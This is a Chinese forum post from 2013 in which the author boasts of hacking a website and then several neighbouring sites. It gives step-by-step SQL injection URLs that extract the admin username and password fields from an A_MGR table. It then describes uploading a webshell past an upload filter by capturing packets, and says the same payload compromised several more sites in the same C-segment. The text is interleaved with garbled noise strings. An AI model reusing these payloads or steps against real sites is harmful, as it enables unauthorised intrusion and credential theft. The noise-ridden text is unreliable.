发现一个注入点
( U" p9 f( f2 o" u, y' N0 Thttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833896 J- q! j) x( Z4 j# E: V
0 E8 \& O4 q8 p# d2 |6 {6 v
习惯性的加’having1=1--1 a6 w- ^0 @8 M: _3 h# f
8 L( ]2 W5 U5 Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
& ~- [4 o L/ c5 C6 g2 f* @0 o3 {- _0 h+ p- O6 j: n+ t
0
/ G$ P# n) b9 ^. y: \
; J3 v3 E* l: Q5 r爆出Diary_A.dl_Title(这时候很激动啊)
5 I4 J {! O% H+ B# w+ T$ V5 C" c3 n
那么继续" u2 k/ W: L1 l4 P
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—9 c! }" L9 `; R/ P9 C( G" G
" g; E8 k- a" }0 l$ H3 h
继续,一直爆下去
4 g$ a: H7 A7 Y) L- z: w! ] T1 {$ u5 j+ }
爆到几个字段和表段 但是没找到需要的管理用户的字段6 ^% V2 |. u& A! {7 ?" r! p
r! {/ g! B' g z! s
蛋疼了 怎么办 然后去后台登陆页看源码
0 R3 t& _! |8 X, n0 _- H8 S
: Z3 q8 R6 v/ S# c0' W3 Z$ S4 v! H! m9 K4 ^9 }
, [/ d; r' c9 Z: C G2 q d% h
Input name= “ADUID”" x5 x- m7 x. S- t! _! V" h
Input name= “ADPWD”
) l1 c8 K% k6 e- ]* `9 |
8 `3 f& k. h1 y) d3 z很幸运 找到了字段那就继续7 _0 q. ?4 G4 k
找到之后开始爆用户1 G& ?3 l# o* I- W0 c. i# Q/ o4 `
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0— W" f0 ]7 Q% @7 T% ]7 _6 R
爆密码. I" a' u' g2 k! H/ Q+ p6 y6 [5 k( t
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
) g5 z$ @7 G3 V W7 t$ h0 D测试了下 这个注入点只能爆到文章哪里的表 0 F) q/ b+ G6 A0 o4 q) a1 G" U
- D. E- f$ O' M& x' r; B头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了) s! N, A( j6 ^- @# N( x; U! `* |8 K
& |5 v7 f/ _$ N/ A" }$ L; R
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了* Y L) _3 Q+ m2 Z9 {
6 a( T: L/ L& o: W$ G- U$ G) E
473
) ~/ C- j* T2 c! H+ H
/ q5 I) g/ y5 t x6 M _进后台
, |" ~/ C: a+ ]% `& z/ {- o- n
# ~) T2 m8 A# O% A% c2 f) h5 v+ k0 K+ o, ?$ n
发现几个上传点 有的地方不能上传 而且防止恶意代码
* b! l2 [1 x# }' C; L; `1 `+ W
+ W: Q0 K H; t; U3 d没办法 各种百度各种找大牛 找到一只好像可以突破的马
1 ^# M( _/ b# X) E) n: s- b- p+ v- d& q; p
0 ~; {) m* x ~' \# L# ~8 Q在系统管理那里直接上传 不过没有显示地址& h' U3 V" k& u3 X1 i
+ d b; Z& l+ g6 ]* D% W0 x
再上传一次 抓包 搞定OK
& D! ]& Z7 r) `3 d1 F8 G% t- w/ Q6 ^2 f$ X' q8 A# L! ]& F
- ^1 J' s; R' M. I# [& i- ?3 N. ]9 H- ]' k* ], n& x2 `! t3 B! d
472
; O# Y5 L5 R f8 g
/ H Z* G. y( r- j X8 s晚上不行了 去睡觉。。。( ?6 Z; y6 `" P; V, N
第二天刚起床 闲的没事做继续日站吧 2 c1 {/ }0 P# K; j$ f: Z3 l2 }3 j
1 W" d$ E, ?4 f- G' e+ B
找个站 就把这个站的旁c扫了下 o t; ~1 Z! V: p
* t: x$ J. r2 M- y, Q. q6 B! R8 d5 D/ t
发现c段也有一个购物站 ,然后还和这个站的模板差不多5 z& |# E% Y6 x" H- J) m3 w6 E
* ]& _' \) e" o) |& Q就找到会员登录口测试
+ k I6 E5 K" n, p7 ~$ S
$ V, m5 i0 N1 A7 I6 ['and (select top 1 MGR_UID from A_MGR)>0—
6 z; B/ w9 _9 }4 U果断爆到了 这时候我很激动 通杀
1 w# m$ i9 {0 y3 G; k
L- t- s ]4 G( a再次翻c段
7 a0 A8 a: f% M9 o, b- X" O# H/ [: l$ ?0 P/ m
翻出几个站 都成功拿下
' z/ E& z3 W c
( u7 M2 u; p( H# z' f$ o( S
1 h, V( i0 }6 s: }3 `- A+ u
' K6 @1 W7 z( P( U9 t, _& O修复方案:
3 X; h8 q1 u8 \' d) f. ^; Z' I, v他们比我专业
4 X. Y* B$ ]' A* J, p" Q
% b u2 l: f" Z0 r) d k, c
5 D& _6 Y/ f* L2 |
) J) F) g% M5 X7 D |
发表于 2013-4-4 17:40:38
收藏
支持
反对